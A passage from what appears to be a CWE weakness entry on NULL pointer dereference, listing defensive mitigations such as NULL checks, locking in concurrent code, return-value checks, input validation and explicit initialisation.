For any pointers that could have been modified or provided from a function that can return NULL, check the pointer for NULL before use. When working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the check, and unlock when it has finished [REF-1484].
Mitigation
Select a programming language that is not susceptible to these issues.
Mitigation
Check the results of all functions that return a value and verify that the value is non-null before acting upon it.
Mitigation
Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values.
Mitigation
Explicitly initialize all variables and other data stores, either during declaration or just before the first usage.
No CAPEC attack patterns related to this CWE.